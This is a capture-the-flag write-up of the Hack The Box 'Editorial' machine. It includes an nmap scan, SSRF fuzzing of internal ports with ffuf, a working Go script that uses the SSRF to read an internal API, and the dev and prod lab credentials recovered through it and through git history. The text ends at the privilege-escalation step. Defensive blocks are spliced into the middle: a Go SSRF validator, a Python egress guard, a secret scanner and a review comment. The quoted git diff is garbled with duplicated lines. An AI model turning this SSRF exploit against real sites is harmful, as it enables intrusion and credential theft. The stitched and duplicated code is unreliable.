HTB Editorial

Editorial

User

Nmap

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ nmap -A 10.129.24.67 -T 4                                               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-16 21:54 EDT
Nmap scan report for 10.129.24.67
Host is up (0.57s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0d:ed:b2:9c:e2:53:fb:d4:c8:c1:19:6e:75:80:d8:64 (ECDSA)
|_  256 0f:b9:a7:51:0e:00:d5:7b:5b:7c:5f:bf:2b:ed:53:a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.48 seconds

The classic two open ports:

22,80


Clicking Preview, my listener received this request:

└─$ nc -lvnkp 80                                                            
listening on [any] 80 ...

connect to [10.10.16.2] from (UNKNOWN) [10.129.24.67] 49816
GET / HTTP/1.1
Host: 10.10.16.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

So the server side is written in Python (the fetch is made with python-requests).

This is an SSRF.

After the server fetches the remote link, the content has to be recognised as an image; otherwise the returned image path is the default unsplash_photo one,

e.g.: /static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg

I also tried the file pseudo-protocol here to read local files, but found that it does not work either.
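As an added example (not code from the writeup or from the Editorial box), here is the server-side check the /upload-cover fetcher is missing: it refuses non-http(s) schemes such as file:// and any host that is, or resolves to, a loopback, private or link-local address. checkFetchURL, isBlocked and lookupFunc are names chosen for this example, and the hostnames used in main are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Added example, not code from the writeup or from the Editorial box. It is the
// server-side check the /upload-cover handler is missing: bookurl is fetched
// exactly as submitted, so loopback addresses and file:// reach the fetcher.
// checkFetchURL, isBlocked and lookupFunc are names chosen for this example.

// isBlocked reports whether a cover-image fetcher must never contact ip:
// unspecified (0.0.0.0), loopback (the internal API on port 5000 lives here),
// RFC 1918 / unique-local private ranges and link-local addresses. IPv4-mapped
// IPv6 addresses such as ::ffff:127.0.0.1 are unmapped first so they cannot
// slip past the IPv4 checks.
func isBlocked(ip net.IP) bool {
	if v4 := ip.To4(); v4 != nil {
		ip = v4
	}
	return ip.IsUnspecified() || ip.IsLoopback() || ip.IsPrivate() ||
		ip.IsLinkLocalUnicast()
}

// lookupFunc resolves a hostname; production code passes net.LookupIP and
// tests pass a fake so the check runs offline.
type lookupFunc func(host string) ([]net.IP, error)

// checkFetchURL decides whether a user-supplied cover URL may be fetched.
// It allows only http/https (so file:// never reaches the fetcher), rejects
// embedded credentials, and requires every address the host resolves to
// to be outside the blocked ranges, not just the first one.
func checkFetchURL(raw string, lookup lookupFunc) error {
	u, err := url.Parse(raw)
	if err != nil {
		return fmt.Errorf("unparseable url: %w", err)
	}
	switch strings.ToLower(u.Scheme) {
	case "http", "https":
	default:
		return fmt.Errorf("scheme %q not allowed", u.Scheme)
	}
	if u.User != nil {
		return errors.New("credentials in url not allowed")
	}
	host := u.Hostname()
	if host == "" {
		return errors.New("empty host")
	}
	ips := []net.IP{}
	if ip := net.ParseIP(host); ip != nil {
		ips = append(ips, ip) // literal address: no DNS involved
	} else {
		resolved, err := lookup(host)
		if err != nil || len(resolved) == 0 {
			return fmt.Errorf("cannot resolve %q", host)
		}
		ips = resolved
	}
	for _, ip := range ips {
		if isBlocked(ip) {
			return fmt.Errorf("host %q resolves to blocked address %s", host, ip)
		}
	}
	return nil
}

func main() {
	// Constructed resolver so the demo runs offline; the hostname is made up.
	fake := func(host string) ([]net.IP, error) {
		if host == "cdn.example.test" {
			return []net.IP{net.ParseIP("203.0.113.10")}, nil
		}
		return nil, errors.New("nxdomain")
	}
	for _, raw := range []string{
		"http://127.0.0.1:5000/api",          // what the writeup sends through bookurl
		"file:///etc/passwd",                 // the file:// attempt
		"http://[::ffff:127.0.0.1]:5000/api", // mapped-address variant of loopback
		"http://cdn.example.test/cover.jpg",  // legitimate public image
	} {
		fmt.Printf("%-40s -> %v\n", raw, checkFetchURL(raw, fake))
	}
}
```

Validating before the fetch still leaves a window if the hostname is resolved again at connect time, so the fetcher should connect to the address it vetted and re-run the same check on every redirect target.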

port-scan

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]                                                                 
└─$ ffuf -request request -w port -v    -c -v  -request-proto http -fs 61                                             
                                                                                                                      
        /'___\  /'___\           /'___\                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/                                                                               
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                              
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                                              
         \ \_\   \ \_\  \ \____/  \ \_\                                                                               
          \/_/    \/_/   \/___/    \/_/                    
                                                                                                                                                                                                                                            
       v2.1.0-dev                                                                                                     
________________________________________________                                                                      
                                                                                                                      
 :: Method           : POST                                                                                                               
 :: URL              : http://editorial.htb/upload-cover                                                                                 
 :: Wordlist         : FUZZ: /home/kali/HTB/machine/SeasonV/linux/Editorial/port                                                          
 :: Header           : Accept: */*                                                                                    
 :: Header           : Origin: http://editorial.htb                                                                   
 :: Header           : Referer: http://editorial.htb/upload                                                                              
 :: Header           : Accept-Encoding: gzip, deflate, br                                                                                
 :: Header           : Connection: keep-alive                                                                                             
 :: Header           : Host: editorial.htb                 
 :: Header           : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
 :: Header           : Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV1WXq3yjFotyeO70                                 
 :: Header           : Accept-Language: en-US,en;q=0.9                                                                                    
 :: Data             : ------WebKitFormBoundaryV1WXq3yjFotyeO70                                                                          
Content-Disposition: form-data; name="bookurl"             
                                                                                                                      
http://127.0.0.1:FUZZ                                                                                                 
------WebKitFormBoundaryV1WXq3yjFotyeO70                                                                                                  
Content-Disposition: form-data; name="bookfile"; filename="Screenshot_2024-06-06_22_57_29.png"                                           
Content-Type: image/png                                                                                               
                                                                                                                      
                                                           
------WebKitFormBoundaryV1WXq3yjFotyeO70--                 
                                                                                                                      
                                                                                                                      
 :: Follow redirects : false                               
 :: Calibration      : false                               
 :: Timeout          : 10                                                                                             
 :: Threads          : 40                                                                                             
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500                                                              
 :: Filter           : Response size: 61                   
________________________________________________           
                                                                                                                                          
[Status: 200, Size: 51, Words: 1, Lines: 1, Duration: 2710ms]                                                                            
| URL | http://editorial.htb/upload-cover                            
    * FUZZ: 5000      

Port 5000

Enumerating the internal ports, port 5000 gives a different response.


┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ cat api |jq '.'                                                                                                                                             
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

That means two requests for every lookup (the upload, then fetching the stored file), so I wrote a simple Go script.

Request.go

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ cat test.go
package main

import (
	"bytes"
	"flag"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
	"net/url"
	"os"
	"strings"
)

var (
	bookurl  = flag.String("bookuri", "", "API URI to request through the SSRF, e.g. /api")
	ProxyURL = flag.String("proxy", "", "HTTP proxy, e.g. http://127.0.0.1:8080")
)

// newClient builds an HTTP client, routed through ProxyURL when one is given
// (handy for watching both requests in Burp).
func newClient() (*http.Client, error) {
	if *ProxyURL == "" {
		return &http.Client{}, nil
	}
	proxyURL, err := url.Parse(*ProxyURL)
	if err != nil {
		return nil, err
	}
	return &http.Client{
		Transport: &http.Transport{Proxy: http.ProxyURL(proxyURL)},
	}, nil
}

// SecondRequest fetches the "cover" the server stored under static/uploads/.
// Because the server saved whatever the internal service returned, this is
// the API response we are after.
func SecondRequest(uri string) {
	req, err := http.NewRequest("GET", fmt.Sprintf("http://editorial.htb/%s", uri), nil)
	if err != nil {
		fmt.Println(err)
		return
	}
	client, err := newClient()
	if err != nil {
		fmt.Println(err)
		return
	}
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println("---------------")
	fmt.Println(string(body))
}

func main() {
	flag.Parse()

	if *bookurl == "" {
		fmt.Println("bookuri is required")
		return
	}

	// Buffer that receives the multipart request body.
	var requestBody bytes.Buffer
	multiPartWriter := multipart.NewWriter(&requestBody)

	// First form field: the URL the server will fetch on our behalf,
	// pointed at the internal API on 127.0.0.1:5000.
	formFieldWriter, err := multiPartWriter.CreateFormField("bookurl")
	if err != nil {
		fmt.Println(err)
		return
	}
	if _, err := formFieldWriter.Write([]byte(fmt.Sprintf("http://127.0.0.1:5000%s", *bookurl))); err != nil {
		fmt.Println(err)
		return
	}

	// Second form field: the file part, filled from a local PNG.
	fileWriter, err := multiPartWriter.CreateFormFile("bookfile", "Screenshot_2024-06-06_22_57_29.png")
	if err != nil {
		fmt.Println(err)
		return
	}
	file, err := os.Open("test.png")
	if err != nil {
		fmt.Println("Error opening file: ", err)
		return
	}
	defer file.Close()
	if _, err := io.Copy(fileWriter, file); err != nil {
		fmt.Println(err)
		return
	}

	// Finish the multipart body so the closing boundary is written.
	multiPartWriter.Close()

	req, err := http.NewRequest("POST", "http://editorial.htb/upload-cover", &requestBody)
	if err != nil {
		fmt.Println(err)
		return
	}

	// Headers copied from the browser request. Go takes Host from req.Host,
	// not from the header map, so it is set directly.
	req.Host = "editorial.htb"
	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36")
	req.Header.Add("Accept", "*/*")
	req.Header.Add("Origin", "http://editorial.htb")
	req.Header.Add("Referer", "http://editorial.htb/upload")
	req.Header.Add("Accept-Encoding", "gzip, deflate, br")
	req.Header.Add("Accept-Language", "en-US,en;q=0.9")
	req.Header.Add("Connection", "close")

	// Content-Type carries the multipart boundary generated by the writer.
	req.Header.Set("Content-Type", multiPartWriter.FormDataContentType())

	client, err := newClient()
	if err != nil {
		fmt.Println(err)
		return
	}
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()

	fmt.Println("Response status:", resp.Status)

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	strBody := string(body)
	// The default unsplash_photo path means the fetched content was not accepted.
	if strings.Contains(strBody, "unsplash") {
		fmt.Println("err uri")
		return
	}
	fmt.Println("Len Body: ", len(strBody))
	fmt.Println(strBody)

	SecondRequest(strBody)
}

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api' --proxy http://127.0.0.1:8080
Response status: 200 OK
Len Body:  51
static/uploads/fa55a699-849a-4df1-8a36-7b39e756a8ce
---------------
{"messages":[{"promotions":{"description":"Retrieve a list of all the promotions in our library.","endpoint":"/api/latest/metadata/messages/promos","methods":"GET"}},{"coupons":{"description":"Retrieve the list of coupons to use in our library.","endpoint":"/api/latest/metadata/messages/coupons","methods":"GET"}},{"new_authors":{"description":"Retrieve the welcome message sended to our new authors.","endpoint":"/api/latest/metadata/messages/authors","methods":"GET"}},{"platform_use":{"description":"Retrieve examples of how to use the platform.","endpoint":"/api/latest/metadata/messages/how_to_use_platform","methods":"GET"}}],"version":[{"changelog":{"description":"Retrieve a list of all the versions and updates of the api.","endpoint":"/api/latest/metadata/changelog","methods":"GET"}},{"latest":{"description":"Retrieve the last version of api.","endpoint":"/api/latest/metadata","methods":"GET"}}]}

                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/coupons' --proxy http://127.0.0.1:8080                                                                                                                    
Response status: 200 OK
Len Body:  51
static/uploads/93e1d12a-99cb-43f9-bb74-153bd09a6057
---------------
[{"2anniversaryTWOandFOURread4":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"12/02/2024"}},{"frEsh11bookS230":{"contact_email_2":"info@tiempoarriba.oc","valid_until":"31/11/2023"}}]

                                                                                                                                                                                                              
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/promos' --proxy http://127.0.0.1:8080                                                                                                                                                   
Response status: 200 OK
Len Body:  51
static/uploads/69a0f1fc-b13a-4b45-af9d-5202f79de6f7
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/authors' --proxy http://127.0.0.1:8080                                                                                                                                                  
Response status: 200 OK
Len Body:  51
static/uploads/a677a473-cf55-4fe7-b4ec-ffd158dc82d8
---------------
{"template_mail_message":"Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, Editorial Tiempo Arriba Team."}

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/messages/how_to_use_platform' --proxy http://127.0.0.1:8080                                                                                                                                      
Response status: 200 OK
Len Body:  51
static/uploads/537c54ad-3223-42a8-8ca0-62a2e0fbed91
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata/changelog' --proxy http://127.0.0.1:8080                                                                                                                                                         
Response status: 200 OK
Len Body:  51
static/uploads/d13bf701-c1b2-44c5-a520-e95de5f0b753
---------------
[{"1":{"api_route":"/api/v1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial El Tiempo Por Arriba"}},{"1.1":{"api_route":"/api/v1.1/metadata/","contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Ed Tiempo Arriba"}},{"1.2":{"contact_email_1":"soporte@tiempoarriba.oc","contact_email_2":"info@tiempoarriba.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v1.2/metadata/"}},{"2":{"contact_email":"info@tiempoarriba.moc.oc","editorial":"Editorial Tiempo Arriba","endpoint":"/api/v2/metadata/"}}]

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ./test -bookuri '/api/latest/metadata' --proxy http://127.0.0.1:8080                                                                                                                                                                   
Response status: 200 OK
Len Body:  51
static/uploads/d3514789-a0f3-42cc-ac6a-a6ade09bf861
---------------
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

The /api/latest/metadata/messages/authors endpoint returned user credentials:

User: dev Password: dev080217_devAPI!@

Logging in over SSH with these credentials succeeds.
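Before moving on to the SSH session, the defender's view of the user path: the cover-preview fetcher accepted any URL and so reached the internal API on the loopback interface, and it only checked afterwards whether the body was an image. The guard below is an added example, not the Editorial application's code; it shows the checks the preview endpoint was missing. The resolve() parameter, the image-signature table and all hostnames and addresses are assumptions chosen so the policy can be exercised offline.

```python
# Added example: an egress guard for a "fetch the cover image from a URL"
# feature. Not the Editorial application's own code; it shows the checks the
# preview endpoint was missing. resolve() is injectable so the policy can be
# tested without network access.
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

# Magic bytes of the image formats the feature is willing to store (assumed set).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def default_resolve(host):
    """Resolve host to every A/AAAA answer using the system resolver."""
    return sorted({info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)})


def is_public_ip(ip_str):
    """True only for globally routable unicast addresses: no loopback, RFC 1918,
    link-local (cloud metadata), multicast or documentation ranges."""
    ip = ipaddress.ip_address(ip_str)
    return ip.is_global and not ip.is_multicast


def check_fetch_url(url, resolve=default_resolve):
    """Validate a user-supplied URL before the server fetches it.

    Returns (hostname, [addresses]) when the fetch is allowed, otherwise raises
    ValueError with the reason. Every resolved address is checked, so a name
    with one public and one private answer is rejected.
    """
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if not parsed.hostname:
        raise ValueError("missing host")
    if parsed.username or parsed.password:
        raise ValueError("credentials in URL not allowed")
    try:
        port = parsed.port
    except ValueError as exc:
        raise ValueError("invalid port") from exc
    if port not in (None, 80, 443):
        raise ValueError(f"port not allowed: {port}")
    try:
        addrs = [str(ipaddress.ip_address(parsed.hostname))]  # literal IP
    except ValueError:
        addrs = list(resolve(parsed.hostname))                 # hostname
    if not addrs:
        raise ValueError("host did not resolve")
    blocked = [a for a in addrs if not is_public_ip(a)]
    if blocked:
        raise ValueError(f"destination is not public: {blocked}")
    return parsed.hostname, addrs


def sniff_image_type(data):
    """Return the MIME type if data starts with a known image signature, else None.
    Run on the fetched body so that JSON or HTML responses are never written
    under static/uploads/ and never shown back to the user."""
    for magic, mime in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None
```

The address returned by check_fetch_url should be the one the HTTP client actually connects to (pin it, or re-check on every redirect), otherwise a name that changes its answer between the check and the fetch still gets through. Combined with the signature check, a response from the loopback API is both unreachable and, if it were reached, discarded.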

┌──(kali㉿kali)-[~/…/machine/SeasonV/linux/Editorial]
└─$ ssh dev@editorial.htb         
The authenticity of host 'editorial.htb (10.129.59.45)' can't be established.
ED25519 key fingerprint is SHA256:YR+ibhVYSWNLe4xyiPA0g45F4p1pNAcQ7+xupfIR70Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'editorial.htb' (ED25519) to the list of known hosts.
dev@editorial.htb's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue Jun 18 03:47:13 AM UTC 2024

  System load:           0.08
  Usage of /:            60.9% of 6.35GB
  Memory usage:          12%
  Swap usage:            0%
  Processes:             224
  Users logged in:       0
  IPv4 address for eth0: 10.129.59.45
  IPv6 address for eth0: dead:beef::250:56ff:fe94:bc3

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jun 10 09:11:03 2024 from 10.10.14.52
dev@editorial:~$ ls
apps  user.txt
dev@editorial:~$ cat user.txt

Root

dev@editorial:~/apps$ ls -al
total 12
drwxrwxr-x 3 dev dev 4096 Jun  5 14:36 .
drwxr-x--- 4 dev dev 4096 Jun  5 14:36 ..
drwxr-xr-x 8 dev dev 4096 Jun  5 14:36 .git

The current directory contains a .git directory, so we can look at the commit history.

prod

dev@editorial:~/apps$ git log
commit 8ad0f3187e2bda88bba85074635ea942974587e8 (HEAD -> master)
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:04:21 2023 -0500

    fix: bugfix in api port endpoint

commit dfef9f20e57d730b7d71967582035925d57ad883
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 21:01:11 2023 -0500

    change: remove debug and update api port

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

commit 1e84a036b2f33c59e2390730699a488c65643d28
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:51:10 2023 -0500

    feat: create api to editorial info

    * It (will) contains internal info about the editorial, this enable
       faster access to information.

commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

dev@editorial:~/apps$ git diff 3251 1e84
diff --git a/app_api/app.py b/app_api/app.py
new file mode 100644
index 0000000..61b786f
--- /dev/null
+++ b/app_api/app.py
@@ -0,0 +1,74 @@
+# API (in development).
+# * To retrieve info about editorial
+
+import json
+from flask import Flask, jsonify
+
+# -------------------------------
+# App configuration
+# -------------------------------
+app = Flask(__name__)
+
+# -------------------------------
+# Global Variables
+# -------------------------------
+api_route = "/api/latest/metadata"
+api_editorial_name = "Editorial Tiempo Arriba"
+api_editorial_email = "info@tiempoarriba.htb"
+
+# -------------------------------
+# API routes
+# -------------------------------
+# -- : home
+@app.route('/api', methods=['GET'])
+def index():
+    data_editorial = {
+        'version': [{
+@app.route('/api', methods=['GET'])
+def index():
+    data_editorial = {
+        'version': [{
+    data_editorial = {
+        'version': [{
+            '1': {
+                'editorial': 'Editorial El Tiempo Por Arriba', 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': '/api/v1/metadata/'
+            }},
+            {
+            '1.1': {
+                'editorial': 'Ed Tiempo Arriba', 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': '/api/v1.1/metadata/'
+            }},
+            {
+            '1.2': {
+                'editorial': api_editorial_name, 
+                'contact_email_1': 'soporte@tiempoarriba.oc',
+                'contact_email_2': 'info@tiempoarriba.oc',
+                'api_route': f'/api/v1.2/metadata/'
+            }},
+            {
+            '2': {
+                'editorial': api_editorial_name, 
+                'contact_email': 'info@tiempoarriba.moc.oc',
+                'api_route': f'/api/v2/metadata/'
+            }},
+            {
+            '2.3': {
+                'editorial': api_editorial_name, 
+                'contact_email': api_editorial_email,
+                'api_route': f'{api_route}/'
+            }
+        }]
+    }
+    return jsonify(data_editorial)
+
+# -- : (development) mail message to new authors
+@app.route(api_route + '/authors/message', methods=['GET'])
+def api_mail_new_authors():
+    return jsonify({
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\
nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.
\n\nBest regards, " + api_editorial_name + " Team."
+    }) # TODO: replace dev credentials when checks pass
+
+# -------------------------------
+# Start program
+# -------------------------------
+if __name__ == '__main__':
+    app.run(host='127.0.0.1', port=5001, debug=True)
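Review bot: api_mail_new_authors, the last route in the hunk, returns a string literal that embeds a real username and password (`nUsername: prod\nPassword: ...`), and the comment `# TODO: replace dev credentials when checks pass` confirms these are live values rather than placeholders; once committed, the literal remains recoverable from history even after a later commit rewrites the message, so the value should be read from configuration kept outside the repository and the exposed credential rotated. Also, `app.run(host='127.0.0.1', port=5001, debug=True)` at the end of the hunk enables the Werkzeug debugger, which must not ship in a service that the main application's image fetcher can reach. The repeated `@app.route('/api', methods=['GET'])` / `def index():` / `data_editorial = {` block near the top of the hunk cannot be valid source (a decorator cannot sit inside a dict literal) and looks like a duplicated listing; the diff should be re-checked against the repository before anything is concluded from that part.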
dev@editorial:~/apps$ cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
prod:x:1000:1000:Alirio Acosta:/home/prod:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
dev@editorial:~/apps$ su prod 
Password: 
prod@editorial:/home/dev/apps$ id
uid=1000(prod) gid=1000(prod) groups=1000(prod)
prod@editorial:/home/dev/apps$ ls
prod@editorial:/home/dev/apps$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

The git diff revealed the prod user's credentials:

prod: 080217_Producti0n_2023!@
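The lesson from the diff is that removing a secret in a later commit does not remove it from the repository: every earlier version is still one git diff away. The scanner below is an added example (not part of this writeup's tooling or the box's code) of the check a pre-commit hook or a history audit would run. It walks the added lines of a unified diff, reports password- or token-looking assignments with their file and line, and skips values that merely reference an environment variable. The sample diff, the placeholder credential EXAMPLE_NOT_REAL_123 and the config.py hunk are constructed for the example.

```python
# Added example: flag credential-looking values in the added lines of a diff.
# Not the writeup's or the box's own code. Patterns are deliberately broad;
# tune them to the code base before relying on the result.
import re
import subprocess

SECRET_PATTERNS = {
    # "password:" / "passwd =" / "pass=" followed by a value
    "password": re.compile(r"(?i)pass(?:word|wd)?\s*[:=]\s*['\"]?(\S+)"),
    # api_key / secret / token assignments
    "token": re.compile(r"(?i)\b(?:api[_-]?key|secret|token)\b\s*[:=]\s*['\"]?(\S+)"),
}
# A value that is itself a reference to the environment is the fix, not a leak.
ENV_REFERENCE = re.compile(r"^(?:os\.environ|os\.getenv|getenv|process\.env|\$)")
HUNK_HEADER = re.compile(r"@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")


def iter_added_lines(diff_text):
    """Yield (path, new_file_line_no, text) for every '+' line of a unified diff."""
    path = None
    new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith("diff --git"):
            path = None                      # new file section starts
            continue
        if raw.startswith("+++ "):
            path = raw[4:].split("\t")[0]
            path = path[2:] if path.startswith("b/") else path
            continue
        if raw.startswith("--- "):
            continue
        m = HUNK_HEADER.match(raw)
        if m:
            new_line = int(m.group(1))       # first new-file line of this hunk
            continue
        if path is None:
            continue                          # "index", "new file mode", ...
        if raw.startswith("+"):
            yield path, new_line, raw[1:]
            new_line += 1
        elif raw.startswith(" "):
            new_line += 1                     # context line consumes a new-file line
        # '-' lines and '\ No newline at end of file' consume none


def find_secrets_in_diff(diff_text):
    """Return [(path, line_no, kind, snippet)] for added lines that look like secrets."""
    findings = []
    for path, line_no, text in iter_added_lines(diff_text):
        for kind, pattern in SECRET_PATTERNS.items():
            m = pattern.search(text)
            if m and not ENV_REFERENCE.match(m.group(1)):
                findings.append((path, line_no, kind, m.group(0)[:60]))
                break                         # one finding per line is enough
    return findings


def scan_history(repo_path):
    """Run the scanner over every commit of a local repository (git log -p --all)."""
    out = subprocess.run(["git", "-C", repo_path, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return find_secrets_in_diff(out)


# Constructed sample: a first commit that embeds a placeholder password in a
# mail template, then a second file that moves a key into the environment.
SAMPLE_DIFF = """\
diff --git a/app_api/app.py b/app_api/app.py
new file mode 100644
--- /dev/null
+++ b/app_api/app.py
@@ -0,0 +1,6 @@
+from flask import Flask, jsonify
+app = Flask(__name__)
+
+@app.route('/api/latest/metadata/authors/message')
+def api_mail_new_authors():
+    return jsonify({'msg': "Username: prod\\nPassword: EXAMPLE_NOT_REAL_123\\nPlease change it."})
diff --git a/config.py b/config.py
--- a/config.py
+++ b/config.py
@@ -10,4 +10,4 @@ import os
 DEBUG = False
-API_KEY = "removed-placeholder-value"
+API_KEY = os.environ.get("API_KEY")
 PORT = 5001
"""

if __name__ == "__main__":
    for finding in find_secrets_in_diff(SAMPLE_DIFF):
        print(finding)
```

Only the app.py line is reported; the config.py change reads the key from the environment and is exactly what the flagged line should become. Run scan_history against a clone to see whether a secret was ever committed, since a clean HEAD says nothing about earlier revisions.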

clone_prod_change.py

